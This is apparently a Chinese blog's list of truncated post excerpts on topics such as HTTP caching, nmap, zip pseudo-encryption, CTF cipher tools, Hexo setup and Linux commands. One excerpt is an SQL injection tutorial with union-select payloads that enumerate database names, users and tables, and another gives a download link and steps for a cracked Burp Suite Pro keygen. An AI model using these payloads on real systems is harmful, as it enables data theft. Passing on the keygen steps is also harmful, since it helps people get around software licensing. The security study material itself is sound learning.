If-Modified-Since：记录页面的最后修改时间。当客户端访问页面时，服务器会将页面最后修改时间通过 Last-Modified 标识由服务器发往客户端，客户端记录修改时间，再次请求本地存在的cache页面时，客户端会通过 If-Modified-Since 头将先前服务器端发过来的最后修改时间戳发送回去，服务器端通过这个时间戳判断客户端的页面是否是最新的，如果不是最新的，则返回新的内容，如果是最新的，则 返回 304 告诉客户端其本地 cache 的页面是最新的，于是客户端就可以直接从本地加载页面了，这样在网络上传输的数据就会大大减少，同时也减轻了服务器的负担。 [Cache-Control max-age=0]：Cache-Control no-cache — 强制每次请求直接发送给源服务器，而不经过本地缓存版本的校验。这对于需要确认认证应用很有用（可以和public结合使用），或者严格要求使用最新数据 的应用（不惜牺牲使用缓存的所有好处） Pragma 当”no-cache”出现在请求消息中时，应用程序应当向原始服务器推送此请求，即使它已经在上次请求时已经缓 ...

第一步：打开ens33网卡的配置： vi /etc/sysconfig/network-scripts/ifcfg-ens33 第二步：把ONBOOT=no改成ONBOOT=yes 第三步：然后重启网络服务： sudo service network restart

Svstem user()系统用户名user()用户名 current_user()当前用户名session_user()连接数据库的用户名database()数据库名version()数据库版本@@datadir数据库路径@basedir数据库安装路径@version comoile os操作系统count()返回执行结果数量 使用?id=’ union select ‘null’,’null’,’null’,’null# 判断列数，发现有四列 4、查看回显位置：?id=’ union select ‘1’,’2’,’3’,’4 5、?id=’ union select ‘1’,database(),user(),’4 查询表：?id=’ union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() and ‘1’=’1 7、查询字段：?id=’ union selec ...

nmap是一款开源、免费的网络探测、安全审计的工具。 nmap扫描原理：首先判断nmap输入的命令行中是否包含域名，如果包含需要利用DNS服务器进行域名解析，然后发送ICMP Echo Request来探测主机存活性，根据返回的数据表来得到机器信息 使用指定dns服务器: –dns-servers 8.8.8.8 www.baidu.com 对于已知主机存活或者防火墙的机器，可以使用-Pn参数停止之前的ICMP请求打到不触发防火墙安全机制 端口状态: open表示端口处于开放状态 closed 表示端口处于关闭状态;Filterd 表示端口处于过滤无法收到返回的probe状态; UnFilterd 表示端口收到返回的probe，但是无法确认;- opend/UnFilterd 表示端口处于开放或者是过滤状态; closed/UnFilterd 表示端口处于关闭或著未过滤状态。 -h：查看自带的帮助信息 nmap参数设置:nmap 扫描单个目标机器 扫端口：nmap 192.168.1.1 tcp全扫描，与目标进行三次握手：nmap -sT 192.168.1.3 使 ...

zip伪加密是在文件头的加密标志位做修改，进而再打开文件时识被别为加密压缩包一个 ZIP 文件由三个部分组成：压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志压缩源文件数据区：50 4B 03 04：这是头文件标记（0x04034b50） *14 00：解压文件所需 pkware 版本00 00：全局方式位标记（有无加密）（有加密就是09 00改为00 00 即可打开伪加密zip）08 00：压缩方式5A 7E：最后修改文件时间F7 46：最后修改文件日期16 B5 80 14：CRC-32校验（1480B516）19 00 00 00：压缩后尺寸（25）17 00 00 00：未压缩尺寸（23）07 00：文件名长度00 00：扩展记录长度6B65792E7478740BCECC750E71ABCE48CDC9C95728CECC2DC849AD284DAD0500压缩源文件目录区：*50 4B 01 02：目录中文件文件头标记(0x02014b50)3F 00：压缩使用的 pkware 版本14 00：解压文件所需 pkware 版本00 00：全局方式位标记（有无加密 ...

http://ctf.ssleye.com/ https://tool.lu/ 栅栏密码： 栅栏密码在线加密解密 - 千千秀字 ook在线加密解密： Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org] 博多码（Baudot code）- 古老的 5bit 编码 Baudot Code, Baudot-Murray Code (online tool) | Boxentriq 波利比奥斯方阵密码加密/解密(棋盘）波利比奥斯方阵密码加密/解密 - 一个工具箱 - 好用的在线工具都在这里！ 希尔（hill）在线加密解密 希尔密码加密/解密 - 一个工具箱 - 好用的在线工具都在这里！ 在线文字转拼音： https://pinyin.supfree.net/ 天干地支对照表：http://114.xixik.com/chinese-era/ 维吉尼亚密码： 明文：ATTACKATDAWN 密钥：LEMONLEMONLE 密文：LXFOPVEFRNHR a的l行是l，如此可得密文，解密的话只 ...

先从吾爱破解论坛下载工具：https://down.52pojie.cn/Tools/Network_Analyzer/Burp_Suite_Pro_v1.7.37_Loader_Keygen.zip 工具运行需要Java环境，请自行安装，此处不赘述。解压完后双击keygen | 填一下License Text(随意)，然后点击Run即可启动BurpSuite的主程序 | 将keygen中得到的License复制粘贴到这里然后点击Next | 点击这个后出现下一个界面 | 点击Copy request，复制完成之后，将字符串粘贴到keygen的Activation Request框里，然后Activation Response框里就有了结果，如下 复制完后，将字符串粘贴到BurpSuite剩下的那个框里，如图 | 再点击Next显示激活成功 | 我们启动看一下过期时间 | 激活之后，不能通过双击BurpSuite主程序来启动，否则启动之后还是需要输入key，两个文件必须放在一个目录下，启动方式有两种 | 通过 keygen 上的 run 按钮来启动 | ...

环境搭建 Git. Node.js 最新的 Node.js 已经集成了 npm npm 官网地址： Node.js https://git-scm.com/ 开始搭建1. 安装 Hexonodejs、git、notepad++和7z的安装过程省略。主要要说的是hexo的安装和配置。再以上几个安装好后，注意测试是否可以再命令行可以使用：git,npm这里虽然使用的是Windows值作但是全部都是使用命令完成，与Linux的命令相同，所以可以Linux也是可以完成的。Win+R-> ‘cmd’ 打开命令行 首先需要配置npm的国内源 1 2 npm config set registry https://registry.npm.taobao.org #配置国内的镜像源 npm info hexo # 测试查看hexo的安装信息，是否是taobao.org的源 1 2 npm install -g hexo # 通过npm安装hexo # -g 指定全局安装，可以使用hexo命令 我这里再切换到桌面路径进行操作 ...

用户名：/etc/hostname host:/etc/hosts cd:进入目录 fn+ctrl+alt+f3切换 sudo：用管理员权限 su：切换用户 date：日期 -s 20120523 设置当前日期 -s 01:01:01具体时间，不设置日期 ls：当前目录下的文件和文件夹 -a全部 -l用长格式显示 -t按修改时间排序。 –reverse倒序 who:系统中有哪些使用者 who am i显示自身用户 -q 显示登陆用户数 pwd:当前路径 ps aux：显示所有进程 passwd XX：更改xx用户的密码 vi,vim,nano：本文编辑器 cp:复制 -r目录下所有文件复制到新目录 rm：删除 -p多级 -f 强制 -r递归 -i 提示 chmod:更改权限 rwx: r:100 w:010 x:001 r:允许打开并读取文件内容 w:允许写入文件或截断文件，但不允许对文件进行重命名或删除。重命名或删除是由目录的属性决定的 x:允许将文件作为程序来执行，使用脚本语言编写的程序必须设置为可读才能被执行 history：历史命令 fi ...